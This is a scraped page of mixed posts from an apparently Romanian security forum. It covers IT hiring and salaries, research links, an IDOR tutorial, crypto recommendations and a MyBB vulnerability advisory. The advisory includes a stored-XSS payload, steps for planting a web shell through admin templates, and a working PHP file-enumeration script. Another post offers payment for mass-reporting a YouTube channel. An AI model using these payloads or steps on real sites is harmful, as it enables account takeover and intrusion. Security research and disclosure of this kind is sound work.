Leaderboard

@tjt " De ce sa nu iti dea ? " - Tu daca ai avea firma ta i-ai da unuia care nu a muncit o zi pe ceea ce ai nevoie 5000 RON? Desi omul poate a mai citit cate ceva, daca nu a lucrat macar 1-2 ani cu ceea ce se cere, nu o sa se compare cu unul care a lucrat. De exemplu, cand m-am angajat ca C++ developer acum 6 ani, stiam limbajul extrem de bine. Dar ca sa vezi, nu prea era deajuns. Nu lucrasem cu sockets, multi-threading, STL, semaphores si mai stiu eu ce, pe cand cineva cu experienta probabil se lovise de cel putin o parte dintre ele. Nu cred ca cineva care nu a lucrat la o companie pe ceva anume, indiferent de ce, a petrecut aproape zilnic cateva ore sa isi dezvolte cunostiintele. Un alt exemplu, e ca inainte sa ma angajez prima oara am vrut sa lucrez ca PHP developer. Scrisesem peste 20.000 de linii de cod, aveam ceva proiecte DAR: nu scrisesem cod MVC (evident), nu lucrasem cu OOP (proiecte mici, evident), nu lucrasem cu niciun framework (la fel). Asadar, de ce sa imi dea 5000 RON pe luna cand eu ar trebui sa stau luni de zile sa invat cum trebuie lucrurile astea? " cineva care a investit timpul personal chiar si bani ca sa isi imbunatateasca cunostinte, sa obtina certificari " - Nu a investit nimeni destul din timpul personal pentru a fi la fel de bun ca cineva care a facut acel lucru 8 ore pe zi timp de 1-2 ani. Si nici nu o sa o faca nimeni. Ca mai citesti zilnic cate un articol, ca din cand in cand citesti o carte, e OK, dar nu e de ajuns. Da, dovedeste entuziasm si conteaza mult, dar nu e de ajuns. Pune-te in locul angajatorului. Cat despre HR, sau "Professional Linkedin browser", din pacate, nu au capacitatea de a trece peste anumite lucruri si de a intelege anumite lucruri. Intotdeauna o sa te lovesti de probleme cu ei si poti pierde locuri de munca bune din cauza ca ei vor considera poate ca "nu are facultate de IT, nu poate sa lucreze pe security", pentru ca ei nu inteleg ca nu exista facultate pentru asa ceva de exemplu. @Philip.J.Fry Nu stiu daca RON sau EUR, nu cred ca EUR in Romania. Da, diploma nu ar trebui sa conteze, ca nu stiu pe nimeni sa fi terminat Facultatea de Reverse Engineering si Analiza Malware in Romania, insa fara experienta mi se pare greu de crezut. Adica serios, ai da cuiva 3.7 EUR pe luna in Romania cuiva care probabil are ceva cunostiinte tehnice dobandite in timpul liber, in locul unuia care a facut asta luni de zile la cine stie ce companie care face antivirus? @gigiRoman Acum vreo 4 ani cred, am avut si eu interviu la Avira pe C++ Developer. Am avut de facut o aplicatie client-server, multithreading si cu nu stiu mai ce functionalitati in 3 ore. Am facut-o si a mers foarte bine, si ziceau cei de acolo ca majoritatea nu o fac in cele 3 ore. Apoi am avut o discutie tehnica. Toate bune si frumoase, pana sa vorbim despre antivirus. Le-am zis ca am facut un crypter, un program care ia un fisier detectabil si il face nedetectabil. Au zis ca "nu se poate, antivirusul nostru il prinde". Le-am explicat cum functioneaza si de ce nu l-ar prinde, ca se incarca in memorie bla-bla, dar nu au parut sa inteleaga. Apoi m-au intrebat: "De ce te-am angaja, de unde stim ca avand acces la codul sursa al antivirusului, nu ai dezvolta in continuare astfel de lucruri?". Am inceput sa rad si le-am zis ca nu am nevoie de codul sursa sa fac asa ceva. Nu m-au mai contactat deloc. Asadar, ca idee generala, de care m-am lovit si eu acum vreo 6 ani cand m-am angajat pe 1600 RON: NU va asteptati sa sara cu banii pe voi, pentru ca nu au de ce. In plus, nu sunteti singurele persoane care isi cauta un loc de munca in IT. Desi sunt destule job-uri, pentru pozitiile de inceput sunt foarte multi care aplica. De asemenea, banuiesc ca daca cineva lucreaza la un proiect in timpul personal, sau face ceva ca sa invete, poate mai posteaza si pe aici. Nu am vazut de ani de zile astfel de lucruri postate. Am fost si eu tanar student, si ce crezi, preferam sa stau sa scriu cod, sau sa beau pana picam din picioare?

Se trag pe cur cand vine vorba de bani, noobii stau la usa sa se angajeze dar in media se plang in fiecare an ca nu au oameni. Administratorul unei firme romanesti Angajatii model pentru multinationala End of the story

Facand putin abstractie de intrebarea-n sine, cred ca am cel putin 2 boli mintale din pricina arogantei intalnite pe la interviuri (fie si programare). Rar am intalnit niste oameni cu cap sa iti vorbeasca de la egal la egal sau macar sa nu-ti vanda povesti cu sirop. Adica pe bune acum, tu iti pui angajatii sa sara pe geam cand vine ANAFu (real story) iar la interviuri o arzi ca o zdreanta cu figuri si oferte pe care nu le poti indeplini? Poate e vremea sa dai faliment sau macar sa iti dai 2 palme... hmm . Cred ca cea mai mare greseala pe care o poti face la un interviu e sa le demonstrezi (fie si accidental) ca nu au unul mai bun ca tine pe acolo, asta ii scoate din minti, ar prefera sa cada tavanul peste ei decat sa inghita asa ceva. Ultima experienta pe care am avut-o a fost sa ii demonstrez prostului ca e prost (ala chipurile era un fel de smecher pe acolo) si asta m-a costat, ironia e ca a sarit si ala la vreo 2 luni .

@Che :>

:)))))))))) Bre astia care vreti salarii de barosani din prima, ia aratati-ne si noua linkedin-ul vostru.

Abstract—We present the password reset MitM (PRMitM) attack and show how it can be used to take over user accounts. The PRMitM attack exploits the similarity of the registration and password reset processes to launch a man in the middle (MitM) attack at the application level. The attacker initiates a password reset process with a website and forwards every challenge to the victim who either wishes to register in the attacking site or to access a particular resource on it. The attack has several variants, including exploitation of a password reset process that relies on the victim’s mobile phone, using either SMS or phone call. We evaluated the PRMitM attacks on Google and Facebook users in several experiments, and found that their password reset process is vulnerable to the PRMitM attack. Other websites and some popular mobile applications are vulnerable as well. Although solutions seem trivial in some cases, our experiments show that the straightforward solutions are not as effective as expected. We designed and evaluated two secure password reset processes and evaluated them on users of Google and Facebook. Our results indicate a significant improvement in the security. Since millions of accounts are currently vulnerable to the PRMitM attack, we also present a list of recommendations for implementing and auditing the password reset process. Download: https://www.ieee-security.org/TC/SP2017/papers/207.pdf

Resources KeenLab's MOSEC 2017 iOS 10 Kernel Security Presentation is Now UP! OASP Pangu 9 Internals Hacking from iOS 8 to iOS 9 Analysis of iOS 9.3.3 Jailbreak & Security Enhancements of iOS 10 iOS内核漏洞挖掘-Fuzz & 代码审计 The Userland Exploits of Pangu 8——cansecwest Improving Mac OS X Security Through Gray Box Fuzzing Technique OS X Kernel is As Strong as its Weakest Part Optimized Fuzzing IOKit in iOS Pangu 9.3 (女娲石） Don't TrustYour Eye:Apple Graphics Is Compromised!——cansecwest Liang Chen Hack in the (sand)Box——Jonathan Levin Video PDF The ARMs race to TrustZone——Jonathan Levin Video PDF iOS 10 - Kernel Heap Revisited——Stefan Esser Video PDF iOS Kernel Exploitation——Stefan Esser Video PDF Link: https://github.com/aozhimin/MOSEC-2017

Beginner Guide to Insecure Direct Object References (IDOR) posted inPenetration Testing, Website Hacking on July 4, 2017 by Raj Chandel Insecure Direct Object References (IDOR) has been placed fourth on the list of OWASP Top 10 Web application security risks since 2013. It allows an authorized user to obtain the information of other users, and could be establish in any type of web applications. Basically it allows requests to be made to specific objects through pages or services without the proper verification of requester’s right to the content. OWASP definition: Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user supplied input and uses it to retrieve an object without performing sufficient authorization checks. The Application uses untested data in a SQL call that is accessing account information. Let consider a scenario where a web application allow the login user to change his secret value. Here you can see the secret value must be referring to some user account of the database. Currently user bee is login into web server for changing his secret value but he is willing to perform some mischievous action that will change the secret value for other user. Using burp suite we had captured the request of browser where you can see in the given image login user is bee and secret value is hello; now manipulate the user from another user. SQLquery = “SELECT * FROM useraccounts WHERE account = ‘bee’; Now let’s change user name into raj as shown in given image. To perform this attack in an application it requires atleast two user accounts. SQLquery = “SELECT * FROM useraccounts WHERE account = ‘raj’; Great!!! We have successfully changed the secret value for raj. Note: in any official website the attacker will replace user account from admin account. Let take another scenario that look quite familiar for most of IDOR attack. Many times we book different order online through their web application for example bookmyshow.com for movie ticket booking. Let consider same scenario in bwapp for movie ticket booking, where I had book 10 tickets of 15 EUR for each. Now let’s confirm it and capture the browser request through burp suite. Now you can see we have intercepted request where highlighted text contains number of tickets and price of one ticket i.e 15 EUR it means it will reduce 150 EUR from my (user) account; now manipulate this price from your desire price. I had changed it into 1 EUR which means now it will reduce only 10 EUR from account, you can observe it from given image then forward the request. Awesome!!! We had booked the 10 tickets in 10 EUR only. Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here Sursa: http://www.hackingarticles.in/beginner-guide-insecure-direct-object-references/

ARM Exploitation: Return Oriented Programming on ARM Slides: https://docs.google.com/viewer?url=dl.dropbox.com%2Fu%2F2595211%2FROP_ARMEXP.pdf

______ ______ _____ ___ _____ _____ _____ | ___ \ | ___ \ | _ | |_ | | ___| / __ \ |_ _| | |_/ / | |_/ / | | | | | | | |__ | / \/ | | | __/ | / | | | | | | | __| | | | | | | | |\ \ \ \_/ / /\__/ / | |___ | \__/\ | | \_| \_| \_| \___/ \____/ \____/ \____/ \_/ _____ _ _ _____ _____ _____ _ _ ______ _____ _____ __ __ |_ _| | \ | | / ___| | ___| / __ \ | | | | | ___ \ |_ _| |_ _| \ \ / / | | | \| | \ `--. | |__ | / \/ | | | | | |_/ / | | | | \ V / | | | . ` | `--. \ | __| | | | | | | | / | | | | \ / _| |_ | |\ | /\__/ / | |___ | \__/\ | |_| | | |\ \ _| |_ | | | | \___/ \_| \_/ \____/ \____/ \____/ \___/ \_| \_| \___/ \_/ \_/ [+]---------------------------------------------------------[+] | Vulnerable Software: MyBB Forum Software | | Vendor: https://mybb.com/ | | Vulnerability Type: File Enumeration, XSS, FPD | | Date Released: 2017 | | Released by: 5tarboy (@insecurity) | [+]---------------------------------------------------------[+] MyBB is vulnerable to a cross site scripting bug which would allow a moderator to take over an administrator's account. In addition to this, it is also possible to perform file enumeration in the instances where it is not possible to spawn a shell. This can be used in conjunction with the FPD and other bugs in order to evelate the level of access and map out a potential attack surface. ------------------------------------------------------------------------------------------------------------- Cross-Site Scripting: ------------------------------------------------------------------------------------------------------------- A moderator or administrator can make an announcement, and can inject JavaScript into this. MyBB however says: > Should HTML be parsed in the announcement? (Javascript is removed) > Source: https://docs.mybb.com/1.6/Mod-CP-Forums-Posts/#Adding.2FEditing_an_Announcement <script> tags are stripped from the content but you can simply use generic HTML tags with event handlers in order to trigger javascript, for example: <svg/onload="document.write('hi');"> When a user views the thread, the javascript will execute. Since a moderator can post these threads, they can craft a payload that would allow them to hijack the cookies for an admin account or create a fake login page via document.write which would hopefully trick an admin into re-authenticating (giving up their credentials) when attempting to view the thread. This is a stored/persistent attack and anyone who views the thread will be hit with the payload. Once you have gained an admin account, it is generally pretty trivial to get shell access. There is a method that has worked for years and will work in most cases: - From AdminCP, Navigate to 'Templates and Styles' - Determine the MyBB Theme currently in use - Navigate to 'Templates' - Open Templates used by the current theme - Select 'calendar templates' - Click 'calendar' then paste code to your shell and save - Navigate to http://[HOST]/calendar.php to access your shell In the instance that you can't get a shell, then File Enumeration can still be performed as seen below: ------------------------------------------------------------------------------------------------------------- Full Path Disclosure: ------------------------------------------------------------------------------------------------------------- Almost all the parameters are vulnerable to this, but this is an example of one: http://[HOST]/mybb/admin/index.php?module[] In older versions of MyBB, It's possible to get FPD (and also some PHP configuration info outputted) without requiring ACP access, this can be done via insertion of an array into the 'sid' get parameter. Example: http://[HOST]/search.php?action=results&sid[]=YourSessionID&sortby=&order=desc ------------------------------------------------------------------------------------------------------------- File Enumeration: ------------------------------------------------------------------------------------------------------------- File enumeration can be performed, allowing an attacker to search for the existence of vulnerable plugins, locate paths to config files, etc. We'll enumerate files by changing the theme file to a file we want. If the file exists, it will not give an error. If the file does not exists, it'll throw an error. A working Proof-of-Concept (written in PHP) is given here: ------------------------------------------------------------------------------------------------------------- <?php //////////////////////////////////////////////////////// PROJECT INSECURITY //////////////////////////////////////////////////////// # Your cookies $cookies = "acploginattempts=; adminsid=; mybbuser=; collapsed=; mybb[lastvisit]=; mybb[lastactive]=; loginattempts=; _ga=; sid="; # Your 'postkey' $post_key = ""; # Target URL $url = "http://localhost/mybb/"; # The file to enumerate $file = "index.php"; # How many paths you wanna go back $amount = 10; # Proxy information $enable_proxy = 0; $proxy_info = "127.0.0.1:9150"; //////////////////////////////////////////////////////// PROJECT INSECURITY //////////////////////////////////////////////////////// function post( $url, $post_key, $cookies, $file, $proxy_info, $proxy ) { $post_data = http_build_query( array( "my_post_key" => "{$post_key}", "tid" => "5", "name" => "insecurity", "pid" => "1", "templateset" => "1", "editortheme" => "{$file}" )); $headers = array( "Cookie: {$cookies}" ); $cURL = curl_init( "{$url}/admin/index.php?module=style-themes&action=edit" ); curl_setopt( $cURL, CURLOPT_POST, true ); curl_setopt( $cURL, CURLOPT_HTTPHEADER, $headers ); curl_setopt( $cURL, CURLOPT_POSTFIELDS, $post_data ); curl_setopt( $cURL, CURLOPT_RETURNTRANSFER, true ); if( $proxy == 1 ) { # Edit this if you wanna use your own proxy curl_setopt( $cURL, CURLOPT_PROXY, $proxy_info ); } $response = curl_exec( $cURL ); curl_close( $cURL ); return $response; } for ( $i = 0; $i < $amount; $i++ ) { $path = str_repeat("../", $i); $result = post( $url, $post_key, $cookies, ( $path . $file ), $proxy_info, $enable_proxy ); if( !preg_match( '/<div class=\"error\">(.*?)<\/div>/s', $result ) ) { $found = true; break; } } if ( isset( $found ) ) print "<b>{$file}</b> does exist."; else print "<b>{$file}</b> does not exist."; ?> ------------------------------------------------------------------------------------------------------------- [+]---------------------------------------------------------[+] | CONTACT US: | | | | IRC: irc.insecurity.zone (6667/6697) #insecurity | | Twitter: @insecurity | | Website: insecurity.zone | [+]---------------------------------------------------------[+]

Depinde de modul de operare al firmei. Daca firma te "inchiriaza" clientului si castigarea contractelor depinde de oamenii pe care ii ai (CV-uri), atunci conteaza si experienta, si certificarile si diploma. Daca nu, accentul o sa se puna mai mult pe ce stii sa faci.

De ce sa nu iti dea ? Toata lumea vorbeste de experienta ca de cel mai 'sfant' lucru pe care trebuie sa-l aiba cineva. Experienta in IT e relativa, nu poti sa compari 5 ani in care ai fixat cate un bug pe ici pe colo pe un proiect mic, iar jumate din cod pe care il scriai era copy-paste de pe stackoverflow cu cineva care a lucrat 2 ani pe un proiect mare in care interactiona cu foarte multi developeri, testeri, analisti, pe un proiect in care nu isi permitea sa bage mizerii in codul de productie ca il arata arhitectul cu degetu'. Eu cred ca cineva care e la inceput, cineva care a investit timpul personal chiar si bani ca sa isi imbunatateasca cunostinte, sa obtina certificari, e mult mai valoros. Dovedeste entuziasm, pasiune si determinare. Ca ai 5 ani de experienta, ca ai 1 an de experienta de cele mai multe ori la noul loc de munca esti pe un proiect total diferit de ceea ce faceai si perioada de tranzitie e la fel pentru ambii. Legat de salariu, depinde cum te vinzi. Cred ca poti pleca lejer de la 4.000 in Bucuresti, dar depinde ce alte beneficii primesti, de numele firmei, de volumul de munca. Si inca ceva, nu cred ca ai certificarile respective. Daca le aveai nu mai intrebai pe forum despre cat ai putea castiga. Daca vrei sa le dai, pune mana pe carte si mult succes.

Da o fuga pana la Iasi http://www.umfiasi.ro/ScoalaDoctorala/TezeDoctorat/Teze Doctorat/Rezumat teza doctorat Alexandru Nemtoi.pdf De obicei lucrarile de doctorat se depun si la biblioteca. http://dental.pacific.edu/Documents/profresources/Medically_Complex.pdf - aici ai etc-ul. http://eprints.ugd.edu.mk/9426/1/1. teza de doctorat - Kiro Papakoca.pdf - pe langa subiect Baga in google "inurl:pdf". Spor

Mai bine iei 17.000 de incompetenti si le dai salarii mici, decat sa iei 1,000 capabili cu salariu rentabil ( care deabia ii gasesti oricum ), stii vorba aia, "cantitate", "volum", "forta de munca" ( pardon, frecat menta )

cat de true poate sa fie ultima poza ... dar si cand reprezinti o multinationala si esti intro echipa care a castigat premii substantiale parca e altfel ...

Se plang expertii pe Info Sec si pe Twitter ca nu gasesc angajati entry level sau medium level, si ca va fi un shortage de vreo 2 milioane de info sec pros pana in 2022. Angajatorii vor sa fi expert, vor diploma de facultate, sa lucrezi deja la Master in InfoSec, sa ai 5+ ai experienta, CISSP, sa fi expert in vreo 2-3 limbaje de programare, si sa ai certificate, sa nu mai vorbesc de salarii de mizerie. Si asta in "the good old U.S.A.". Pai cum sa nu fie, daca HR-ul ii plin de tampiti, care folosesc metode invechite de angajare, si care nici nu stiu ce ii ala un OSCP sau alte certificari, si efortul pe care trebuie sa il depuna careva sa obtina certificarile alea. Nu vorbesc de certificarile care au dumps pe undeva, si de alea care nu au dumps, si la care trebuie sa iti bati capul. Din cate aplicatii am trimis pentry entry level, cu ani de experienta in IT, HR-ul nici nu s-au obosit ca macar sa imi raspunda ca de ce. Pentru ca li se rupe, sunt lenesi si incompetenti! O fi vreun fel de PR stunt combinat cu batjocura. Anul asta am zis sa ma duc la DefCon in Las Vegas, ca am zis sa fac un pic de "social networking" ca da-de va fi ceva. Am fost la niste cursuri foarte bune printr-o comunitate la vreo 1 ora distanta de mine, in infrastructure si web application pentesting, si toti ar vrea sa faca tranzitia de la sys admin, helpdesk in Info Sec, dar vad batjocura si lipsa de educatie legata de Info Sec a celor din HR, si prefera sa ramana pe pozitiile lor. In plus, multi ca sa intre in Info Sec trebuie sa inceapa de la entry level, si asta ar insemna sa piarda bani. Pana vom vedea ca se schimba mentalitatea celor din HR legat de info sec, vor trece cativa ani. In plus, e foarte multa aroganta in Info Sec din partea celor deja stabiliti in industrie, si asta nu face decat sa dauneze celor care vorb sa intre in Info Sec. Cam ce am vazut ca se poate face, e sa te muti in alte orase, numai ca sa lucrezi in Info Sec, ceea ce insemna sa lasi in urma casa (fara chirie), prietenii, familia, etc. Putini is dispusi sa faca asta si mai ales pe bani putini!

Plateste pe dracu lesinatu asta, n'are 1leu sa-si ia un covrig.

Publicat pe 5 iul. 2017 Live workshop walkthrough for the TI addr_limit bug Using syscalls in the kernel (or simply forgetting to reset the addr_limit value before returning to user space) may lead to this type of bugs. We're using a stack info leak with the buggy get_fs/set_fs code to overwrite the (e)uid and (e)gid of the current process to elevate privileges.

Cunosc pe cineva care primeste in jur de 3.7k pe post de reverse engineer, nu are experienta si nici diploma

Daca nu ai experienta de munca sau cel putin proiecte personale, orice, nu iti da nimeni 5000 RON. Dar de crescut poate sa creasca destul de mult.

WSUXploit Written by Marcio Almeida to weaponize the use of WSUSpect Proxy created by Paul Stone and Alex Chapman in 2015 and public released by Context Information Security Summary This is a MiTM weaponized exploit script to inject 'fake' updates into non-SSL WSUS traffic. It is based on the WSUSpect Proxy application that was introduced to public on the Black Hat USA 2015 presentation, 'WSUSpect – Compromising the Windows Enterprise via Windows Update' Please read the White Paper and the presentation slides listed below: White paper: http://www.contextis.com/documents/161/CTX_WSUSpect_White_Paper.pdf Slides: http://www.contextis.com/documents/162/WSUSpect_Presentation.pdf Sursa: https://github.com/pimps/wsuxploit

Symmetric Encryption The only way to encrypt today is authenticated encryption, or "AEAD". ChaCha20-Poly1305 is faster in software than AES-GCM. AES-GCM will be faster than ChaCha20-Poly1305 with AES-NI. Poly1305 is also easier than GCM for library designers to implement safely. AES-GCM is the industry standard. Use, in order of preference: The NaCl/libsodium default Chacha20-Poly1305 AES-GCM Avoid: AES-CBC, AES-CTR by itself Block ciphers with 64-bit blocks such as Blowfish OFB mode RC4, which is comically broken Symmetric Key Length See The Physics of Brute Force to understand why 256-bit keys is more than sufficient. But rememeber: your AES key is far less likely to be broken than your public key pair, so the latter key size should be larger if you're going to obsess about this. Use: Minimum- 128-bit keys Maximum- 256-bit keys Avoid: Constructions with huge keys Cipher "cascades" Key sizes under 128 bits Symmetric Signatures If you're authenticating but not encrypting, as with API requests, don't do anything complicated. There is a class of crypto implementation bugs that arises from how you feed data to your MAC, so, if you're designing a new system from scratch, Google "crypto canonicalization bugs". Also, use a secure compare function. Use: HMAC Avoid: HMAC-MD5 HMAC-SHA1 Custom "keyed hash" constructions Complex polynomial MACs Encrypted hashes Anything CRC Hashing/HMAC Algorithm If you can get away with it you want to use hashing algorithms that truncate their output and sidesteps length extension attacks. Meanwhile: it's less likely that you'll upgrade from SHA-2 to SHA-3 than it is that you'll upgrade from SHA-2 to BLAKE2, which is faster than SHA-3, and SHA-2 looks great right now, so get comfortable and cuddly with SHA-2. Use, in order of preference: HMAC-SHA-512/256 HMAC-SHA-512/224 HMAC-SHA-384 HMAC-SHA-224 HMAC-SHA-512 HMAC-SHA-256 Alternately, use in order of preference: BLAKE2 SHA3-512 SHA3-256 Avoid: HMAC-SHA-1 HMAC-MD5 MD6 EDON-R Random IDs When creating random IDs, numbers, URLs, nonces, initialization vectors, or anything that is random, then you should always use /dev/urandom. Use: /dev/urandom Create: 256-bit random numbers Avoid: Userspace random number generators /dev/random Password Hashing When using scrypt for password hashing, be aware that It is very sensitive to the parameters, making it possible to end up weaker than bcrypt, and suffers from time-memory trade-off (source #1 and source #2). When using bcrypt, make sure to use the following algorithm to prevent the leading NULL byte problem and the 72-character password limit: bcrypt(base64(sha-512(password))) I'd wait a few years, until 2020 or so, before implementing any of the Password Hashing Competition candidates, such as Argon2. They just haven't had the time to mature yet. Use, in order of preference: scrypt bcrypt sha512crypt sha256crypt PBKDF2 Avoid: Plaintext Naked SHA-2, SHA-1, MD5 Complex homebrew algorithms Any encryption algorithm Asymmetric Encryption It's time to stop using vanilla RSA, and start using NaCl/libsodium. Of all the cryptographic "best practices", this is the one you're least likely to get right on your own. NaCl/libsodium has been designed to prevent you from making stupid mistakes, it's highly favored among the cryptographic community, and focuses on modern, highly secure cryptographic primitives. It's time to start using ECC. Here are several reasons you should stop using RSA and switch to elliptic curve software: Progress in attacking RSA --- really, all the classic multiplicative group primitives, including DH and DSA and presumably ElGamal --- is proceeding faster than progress against elliptic curve. RSA (and DH) drag you towards "backwards compatibility" (ie: downgrade-attack compatibility) with insecure systems. Elliptic curve schemes generally don't need to be vigilant about accidentally accepting 768-bit parameters. RSA begs implementors to encrypt directly with its public key primitive, which is usually not what you want to do: not only does accidentally designing with RSA encryption usually forfeit forward-secrecy, but it also exposes you to new classes of implementation bugs. Elliptic curve systems don't promote this particular foot-gun. The weight of correctness/safety in elliptic curve systems falls primarily on cryptographers, who must provide a set of curve parameters optimized for security at a particular performance level; once that happens, there aren't many knobs for implementors to turn that can subvert security. The opposite is true in RSA. Even if you use RSA-OAEP, there are additional parameters to supply and things you have to know to get right. If you have to use RSA, do use RSA-OAEP. But don't use RSA. Use ECC. Use: NaCl/libsodium Avoid: RSA-PKCS1v15 RSAES-OAEP RSASSA-PSS with MGFI-256, Really, anything RSA ElGamal OpenPGP, OpenSSL, BouncyCastle, etc. Asymmetric Key Length As with symmetric encryption, asymmetric encryption key length is a vital security parameter. Academic, private, and government organizations provide different recommendations with mathematical formulas to approimate the minimum key size requirement for security. See BlueKcrypt's Cryptographyc Key Length Recommendation for other recommendations and dates. To protect data up through 2020, it is recommended to meet the minimum requirements for asymmetric key lengths: Method RSA ECC D-H Key D-H Group Lenstra/Verheul 1881 161 151 1881 Lenstra Updated 1387 163 163 1387 ECRYPT II 1776 192 192 1776 NIST 2048 224 224 2048 ANSSI 2048 200 200 2048 BSI 3072 256 256 3072 See also the NSA Fact Sheet Suite B Cryptography and RFC 3766 for additional recommendations and math algorithms for calculating strengths based on calendar year. Personally, I don't see any problem with using 2048-bit RSA/DH group and 256-bit ECC/DH key lengths. So, my recommendation would be: Use: 256-bit minimum for ECC/DH Keys 2048-bit minimum for RSA/DH Group Avoid: Not following the above recommendations. Asymmetric Signatures In the last few years there has been a major shift away from conventional DSA signatures and towards misuse-resistent "deterministic" signature schemes, of which EdDSA and RFC6979 are the best examples. You can think of these schemes as "user-proofed" responses to the Playstation 3 ECDSA flaw, in which reuse of a random number leaked secret keys. Use deterministic signatures in preference to any other signature scheme. Use, in order of preference: NaCl/libsodium Ed25519 RFC6979 (deterministic DSA/ECDSA) Avoid: RSA-PKCS1v15 RSASSA-PSS with MGF1+SHA256 Really, anything RSA Vanilla ECDSA Vanilla DSA Diffie-Hellman This is the trickiest one. Here is roughly the set of considerations: If you can just use Nacl, use Nacl. You don't even have to care what Nacl does. If you can use a very trustworthy library, use Curve25519; it's the modern ECDH curve with the best software support and the most analysis. People really beat the crap out of Curve25519 when they tried to get it standardized for TLS. There are stronger curves, but none supported as well as Curve25519. But don't implement Curve25519 yourself or port the C code for it. If you can't use a very trustworthy library for ECDH but can for DH, use DH-2048 with a standard 2048 bit group, like Colin says, but only if you can hardcode the DH parameters. But don't use conventional DH if you need to negotiate parameters or interoperate with other implementations. If you have to do handshake negotiation or interoperate with older software, consider using NIST P-256, which has very widespread software support. Hardcoded-param DH-2048 is safer than NIST P-256, but NIST P-256 is safer than negotiated DH. But only if you have very trustworthy library support, because NIST P-256 has some pitfalls. P-256 is probably the safest of the NIST curves; don't go down to -224. Isn't crypto fun? If your threat model is criminals, prefer DH-1024 to sketchy curve libraries. If your threat model is governments, prefer sketchy curve libraries to DH-1024. But come on, find a way to one of the previous recommendations. It sucks that DH (really, "key agreement") is such an important crypto building block, but it is. Use, in order of preference: NaCl/libsodium 2048-bit Diffie-Hellman Group #14 Avoid: conventional DH SRP J-PAKE Handshakes and negotiation Elaborate key negotiation schemes that only use block ciphers srand(time()) Website security By "website security", we mean "the library you use to make your web server speak HTTPS". Believe it or not, OpenSSL is still probably the right decision here, if you can't just delegate this to Amazon and use HTTPS elastic load balancers, which makes this their problem not yours. Use: OpenSSL, LibreSSL, or BoringSSL if you run your own site Amazon AWS Elastic Load Balancing if Amazon does Avoid: PolarSSL GnuTLS MatrixSSL Client-server application security What happens when you design your own custom RSA protocol is that 1-18 months afterwards, hopefully sooner but often later, you discover that you made a mistake and your protocol had virtually no security. A good example is Salt Stack. Salt managed to deploy e=1 RSA. It seems a little crazy to recommend TLS given its recent history: The Logjam DH negotiation attack The FREAK export cipher attack The POODLE CBC oracle attack The RC4 fiasco The CRIME compression attack The Lucky13 CBC padding oracle timing attack The BEAST CBC chained IV attack Heartbleed Renegotiation Triple Handshakes Compromised CAs Here's why you should still use TLS for your custom transport problem: Many of these attacks only work against browsers, because they rely on the victim accepting and executing attacker-controlled Javascript in order to generate repeated known/chosen plaintexts. Most of these attacks can be mitigated by hardcoding TLS 1.2+, ECDHE and AES-GCM. That sounds tricky, and it is, but it's less tricky than designing your own transport protocol with ECDHE and AES-GCM! In a custom transport scenario, you don't need to depend on CAs: you can self-sign a certificate and ship it with your code, just like Colin suggests you do with RSA keys. Use: TLS Avoid: Designing your own encrypted transport, which is a genuinely hard engineering problem; Using TLS but in a default configuration, like, with "curl" Using "curl" IPSEC Online backups Of course, you should host your own backups in house. The best security is the security where others just don't get access to your data. There are many tools to do this, all of which should be using OpenSSH or TLS for the transport. If using an online backup service, use Tarsnap. It's withstood the test of time. Use: Tarsnap Avoid: Google Apple Microsoft Dropbox Amazon S3 Sursa: https://gist.github.com/atoponce/07d8d4c833873be2f68c34f9afc5a78a

PPEE (puppy) is a Professional PE file Explorer for reversers, malware researchers and those who want to statically inspect PE files in more details Puppy is free and tries to be small, fast, nimble and friendly as your puppy Download v1.09 Visual C++ 2010 Redistributable Package required Features Puppy is robust against malformed and crafted PE files which makes it handy for reversers, malware researchers and those who want to inspect PE files in more details. All directories in a PE file including Export, Import, Resource, Exception, Certificate(Relies on Windows API), Base Relocation, Debug, TLS, Load Config, Bound Import, IAT, Delay Import and CLR are supported. Both PE32 and PE64 support Examine YARA rules against opened file Virustotal and OPSWAT's Metadefender query report Statically analyze windows native and .Net executables Robust Parsing of exe, dll, sys, scr, drv, cpl, ocx and more Edit almost every data structure Easily dump sections, resources and .Net assembly directories Entropy and MD5 calculation of the sections and resource items View strings including URL, Registry, Suspicious, ... embedded in files Detect common resource types Extract artifacts remained in PE file Anomaly detection Right-click for Copy, Search in web, Whois and dump Built in hex editor Explorer context menu integration Descriptive information for data members Refresh, Save and Save as menu commands Drag and drop support List view columns can sort data in an appropriate way Open file from command line Checksum validation Plugin enabled Link: https://www.mzrst.com/

Puzzle No.1 – Monday 3 July We've got something new for you today. It's a puzzle that's been set for us by GCHQ and the kind of thing they use to recruit staff. We'll be setting a new puzzle every day so why not have go and see if you could make it as a GCHQ codebreaker. Puzzle Take the digits 1,2,3 up to 9 in numerical order and put either a plus sign or a minus sign or neither between the digits to make a sum that adds up to 100. For example, one way of achieving this is: 1 + 2 + 34 - 5 + 67 - 8 + 9 = 100, which uses six plusses and minuses. What is the fewest number of plusses and minuses you need to do this? The answer will be published on the Today website from 6am on Tuesday 4 July. source

Whitepaper called Fully Undetectable Malware Fully Undetectable Malware Term Paper candidate Alessandro Groppo Institute of Higher Education "Camillo Olivetti” 2016/2017 School Year Download / View: https://www.scribd.com/document/352790073/Fully-Undetectable-Malware Mirror: https://dl.packetstormsecurity.net/papers/general/fully-undetectable-malware.pdf

Professional Penetration Testing walks you through the entire process of setting up and running a pen test lab. Penetration testing—the act of testing a computer network to find security vulnerabilities before they are maliciously exploited—is a crucial component of information security in any organization. With this book, you will find out how to turn hacking skills into a professional career. Chapters cover planning, metrics, and methodologies; the details of running a pen test, including identifying and verifying vulnerabilities; and archiving, reporting and management practices. Free download: aHR0cHM6Ly9nb28uZ2wvYVBIOVp5 Buy: https://www.amazon.com/Professional-Penetration-Testing-Creating-Learning-ebook/dp/B00DRF0ICK/

DELETED

thank's

buna, stiu ca este umpic cam vechi acest topic, insa as avea nevoie de cineva care se pricepe sa dea mii si mii de reporturi la un canal de youtube, platesc foarte bine pentru aceasta actiune :))) daca cineva este interesat sa ma contacteze pe privat, este vorba de un canal cu peste 100K subscribers.